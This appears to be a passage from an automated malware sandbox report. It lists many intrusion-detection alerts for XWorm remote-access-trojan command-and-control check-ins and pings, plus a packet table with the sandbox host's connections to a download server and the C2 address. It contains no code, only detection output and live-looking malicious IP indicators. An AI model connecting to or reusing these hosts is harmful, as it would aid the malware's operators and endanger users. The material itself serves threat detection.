                                  2024-08-04T12:55:35.124193+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:09.289072+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:11.559069+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:40.617286+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:05.947630+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:53:23.277517+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M23912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:09.846382+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:38.213688+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:29.740951+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:44.891784+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:15.720185+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:43.508505+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:50.599276+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:44.584389+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:03.465274+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:19.822257+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:53.538642+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M23912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:45.365270+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:03.263663+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:21.397440+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:21.009793+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:21.010943+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:58.355933+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:23.594493+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:27.609238+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:46.549832+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:23.283648+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M23912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:15.860799+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:15.720206+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:41.246654+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:35.528197+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:43.755106+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:03.463431+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:09.287190+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:37.997141+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:09.852934+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:11.939224+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:19.217375+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:47.055431+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:11.360680+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:57:06.184542+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:23.266990+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M23912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:53.271306+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M23912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:57:00.429641+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:27.800134+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:27.983360+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:53:53.283072+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M23912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:10.050900+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:27.611774+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:38.178135+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:53:50.333997+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:52.577940+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:54.074226+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:35.313279+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:43.323131+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:58.865909+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:57:06.185869+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:37.811232+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:20.811531+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:47.285590+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:14.587142+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:09.223807+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:41.248656+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:56.744524+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:42.221935+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:27.981272+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:52.584380+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:15.743831+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:09.024681+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:21.911230+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:35.311857+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:54.076314+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:13.784981+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:33.214551+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:20.812792+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:53.540850+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M23912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:09.022270+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:45.741251+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:57.306074+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:03.976939+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:09.222397+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:05.954744+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:43.228145+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:22.363128+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:42.215104+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:33.212681+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:23.596143+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:43.224505+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:43.130008+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:21.415160+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:19.602157+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:29.736588+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:19.418262+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:14.581580+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:27.797135+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:53:22.485245+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:22.359163+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:27.588673+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:11.751209+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:43.752626+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:09.407497+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:15.850657+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:22.007653+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:40.620856+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:47.290507+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:45.748978+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:59.663341+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:53:22.202601+0200TCP2855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:04.050028+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:12.050051+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:23.266471+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M23912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:35.124472+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:50.591105+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:38.185121+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:45.557046+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:45.558465+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:03.673819+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:53:22.605844+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:03.985940+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:08.757480+0200TCP2853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:46.548058+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:55:04.048022+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:19.218928+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:04.163817+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:10.052207+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:27.590423+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:06.724849+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:56:37.992711+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:47.057193+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:11.560748+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:56:37.804639+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  2024-08-04T12:54:15.735027+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:21.915290+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:55:58.358434+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:57.314856+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:53:50.338154+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:21.198042+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4973339129192.168.2.4147.185.221.17
                                  2024-08-04T12:54:15.718707+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3912949733147.185.221.17192.168.2.4
                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 4, 2024 12:52:58.450124025 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:58.455070019 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:58.455205917 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:58.456079006 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:58.460855007 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.216367960 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.216389894 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.216458082 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.216496944 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.216512918 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.216521025 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.216535091 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.216552019 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.216620922 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.216634989 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.216635942 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.216635942 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.216644049 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.216752052 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.216752052 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.221581936 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.221640110 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.221654892 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.221698046 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.272423029 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.343719006 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.343735933 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.343751907 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.343775988 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.343921900 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.343921900 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.348520041 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.348546028 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.348562002 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.348577976 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.348594904 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.348628044 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.353229046 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.353245974 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.353288889 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.353296041 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.353305101 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.353353977 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.357940912 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.357956886 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.357980013 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.357996941 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.358011961 CEST80497305.45.238.155192.168.2.4
                                  Aug 4, 2024 12:52:59.358014107 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.358062983 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:52:59.413136005 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:53:01.796395063 CEST4973080192.168.2.45.45.238.155
                                  Aug 4, 2024 12:53:08.137769938 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:53:08.142698050 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:53:08.142766953 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:53:08.310466051 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:53:08.315321922 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:53:22.202600956 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:53:22.207561016 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:53:22.485244989 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:53:22.538125992 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:53:22.605844021 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:53:22.610666990 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:53:23.277517080 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:53:23.319345951 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:53:36.085679054 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:53:36.090717077 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:53:36.370172977 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:53:36.371953011 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:53:36.376890898 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:53:49.976783991 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:53:50.055460930 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:53:50.333997011 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:53:50.338154078 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:53:50.343338013 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:53:53.283071995 CEST3912949733147.185.221.17192.168.2.4
